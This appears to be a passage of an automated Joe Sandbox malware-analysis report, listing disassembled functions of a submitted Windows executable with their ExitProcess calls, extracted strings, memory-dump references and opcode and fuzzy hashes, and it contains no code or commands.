                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExitProcess
                                                                                                                                              • String ID: L$L$W$Windows 95$a$a$b$d$i$o$r$r$y
                                                                                                                                              • API String ID: 621844428-1254073115
                                                                                                                                              • Opcode ID: e73cb6a01dc10b5a82334384cf326f9750e6c6c60bf6ad37b4e053010980c236
                                                                                                                                              • Instruction ID: 002ba12ece9c9b47baed33734d15a8fee468393e4ca8b9fa760db5392b251f20
                                                                                                                                              • Opcode Fuzzy Hash: e73cb6a01dc10b5a82334384cf326f9750e6c6c60bf6ad37b4e053010980c236
                                                                                                                                              • Instruction Fuzzy Hash: 7B6125A2D086649AF7208624EC447E76A39DF50310F1440FED94DA72C1DABE0FD68BA7
                                                                                                                                              Function 00408502 Relevance: 24.7, APIs: 1, Strings: 13, Instructions: 188COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExitProcess
                                                                                                                                              • String ID: L$L$W$Windows 95$a$a$b$d$i$o$r$r$y
                                                                                                                                              • API String ID: 621844428-1254073115
                                                                                                                                              • Opcode ID: 606e63f531aa979e66e4b79544cdfa3c1b55464958fa5903861b0c72f1933b73
                                                                                                                                              • Instruction ID: 70b32fb56e953e831ee1c6a9b067e3275182b7350fbba4091f78134af53b1258
                                                                                                                                              • Opcode Fuzzy Hash: 606e63f531aa979e66e4b79544cdfa3c1b55464958fa5903861b0c72f1933b73
                                                                                                                                              • Instruction Fuzzy Hash: 3F6114A2D082649AF7218624DC447EB7A79DF50314F1440FED94DA72C1DABE0FC68B67
                                                                                                                                              Function 00408770 Relevance: 24.7, APIs: 1, Strings: 13, Instructions: 187COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExitProcess
                                                                                                                                              • String ID: L$L$W$Windows 95$a$a$b$d$i$o$r$r$y
                                                                                                                                              • API String ID: 621844428-1254073115
                                                                                                                                              • Opcode ID: c4be063b547142f42d0c13c4066b1a4a8f240d041d58b5e6cc6055d236f2c1ef
                                                                                                                                              • Instruction ID: a72bb31166aa381497903e97bc9c24f5bcc4b6703112e4e099c378d301880388
                                                                                                                                              • Opcode Fuzzy Hash: c4be063b547142f42d0c13c4066b1a4a8f240d041d58b5e6cc6055d236f2c1ef
                                                                                                                                              • Instruction Fuzzy Hash: D06103A1D082649AF7218624DC447EB7A39DF50310F1440FED94DA72C1DABE0FC68B67
                                                                                                                                              Function 0040884D Relevance: 24.7, APIs: 1, Strings: 13, Instructions: 172COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExitProcess
                                                                                                                                              • String ID: L$L$W$Windows 95$a$a$b$d$i$o$r$r$y
                                                                                                                                              • API String ID: 621844428-1254073115
                                                                                                                                              • Opcode ID: b61b37e6c1c3ce702835899ca951e94c148d5ddb985cd3c2e1f30e08d6961b1c
                                                                                                                                              • Instruction ID: 908e1b507a0170028a9da51af9384c436a8bbe588f6ececa98b85f8372e705ec
                                                                                                                                              • Opcode Fuzzy Hash: b61b37e6c1c3ce702835899ca951e94c148d5ddb985cd3c2e1f30e08d6961b1c
                                                                                                                                              • Instruction Fuzzy Hash: CB5114A1D082648AF7218624DC447EB7A39DF91310F1440FED98DA76C1DABE0FD68B67
                                                                                                                                              Function 0040898D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 111COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExitProcess
                                                                                                                                              • String ID: GGN9$Windows 95
                                                                                                                                              • API String ID: 621844428-3770922624
                                                                                                                                              • Opcode ID: 35d5a47730b24da60319818b9ddf853cfb2f8b3c7cb5040908ea032ef5fb614c
                                                                                                                                              • Instruction ID: 1e537a0af2ca5927453d0216449e8262732467145e920a59f4c5c1172cade705
                                                                                                                                              • Opcode Fuzzy Hash: 35d5a47730b24da60319818b9ddf853cfb2f8b3c7cb5040908ea032ef5fb614c
                                                                                                                                              • Instruction Fuzzy Hash: 0F31F5F2D041249EF3504654ED84BFB362CDB80320F24817FD84EA66C1EA7D5EC689A7
                                                                                                                                              Function 00408A7C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 41COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ExitProcess.KERNEL32(00000000,00409BD3,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409F62
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExitProcess
                                                                                                                                              • String ID: 2H?$Windows 95
                                                                                                                                              • API String ID: 621844428-1577999745
                                                                                                                                              • Opcode ID: 557803fb8bd20435206b454844b31fe281f146a0072662f4d932d07f3a7b7531
                                                                                                                                              • Instruction ID: df9b69ad1b3a695b7739b8a46ca64f59184ba8a5aea23e33a92a66da250e7302
                                                                                                                                              • Opcode Fuzzy Hash: 557803fb8bd20435206b454844b31fe281f146a0072662f4d932d07f3a7b7531
                                                                                                                                              • Instruction Fuzzy Hash: 66F0BBE24041045EF3904514ED45BB7352DEBC0725F24857BE54DE59C0EB3D5EDA8962
                                                                                                                                              Function 004090B7 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 186COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ExitProcess.KERNEL32(00000000,00409BD3,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409F62
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExitProcess
                                                                                                                                              • String ID: XS
                                                                                                                                              • API String ID: 621844428-3742125962
                                                                                                                                              • Opcode ID: 0ef25803c13e20af9dc778cc44436636eddc744375c3422ed6ea6209976354ca
                                                                                                                                              • Instruction ID: a598b56ad7ce94824c6271aba02b776f62d75a0bea01325358fd3efd258981fd
                                                                                                                                              • Opcode Fuzzy Hash: 0ef25803c13e20af9dc778cc44436636eddc744375c3422ed6ea6209976354ca
                                                                                                                                              • Instruction Fuzzy Hash: 575157F2D04154ABF7208A21DC44BAB7B78EBC1314F1881BBD90D63382D63D6EC6CA52
                                                                                                                                              Function 00408DE5 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 177COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ExitProcess.KERNEL32(00000000,00409BD3,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409F62
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExitProcess
                                                                                                                                              • String ID: Windows 95
                                                                                                                                              • API String ID: 621844428-1505401244
                                                                                                                                              • Opcode ID: 65ed9145258f5a4505704d2105be48a53147dc18223b7f21a8b4a6edc79f2ac5
                                                                                                                                              • Instruction ID: b5c5277cee7fc260ead8147ba84ca6eb3f3e9c1979ee068eb39e8a28ff91bfcc
                                                                                                                                              • Opcode Fuzzy Hash: 65ed9145258f5a4505704d2105be48a53147dc18223b7f21a8b4a6edc79f2ac5
                                                                                                                                              • Instruction Fuzzy Hash: A15115F2D041149FF7248A14DD45BFB7679EF80310F2481BBE84DA2780EA7D5EC58A66
                                                                                                                                              Function 00408B81 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 136COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ExitProcess.KERNEL32(00000000,00409BD3,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409F62
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExitProcess
                                                                                                                                              • String ID: Windows 95
                                                                                                                                              • API String ID: 621844428-1505401244
                                                                                                                                              • Opcode ID: e2842fda6e01ffc964cc67038059166aa85a9d0e01609f0bc19109ce1b98e191
                                                                                                                                              • Instruction ID: 313057cb3b46385950b25b97b415f34978dc172aa2866f2568b428467c6bd824
                                                                                                                                              • Opcode Fuzzy Hash: e2842fda6e01ffc964cc67038059166aa85a9d0e01609f0bc19109ce1b98e191
                                                                                                                                              • Instruction Fuzzy Hash: 0641F3F1D041189AF7248A14DD45BFB7679EF80310F2081BBE949A2380EA3D1EC68A26
                                                                                                                                              Function 00408BAE Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 126COMMON
                                                                                                                                              Download Yara Rule
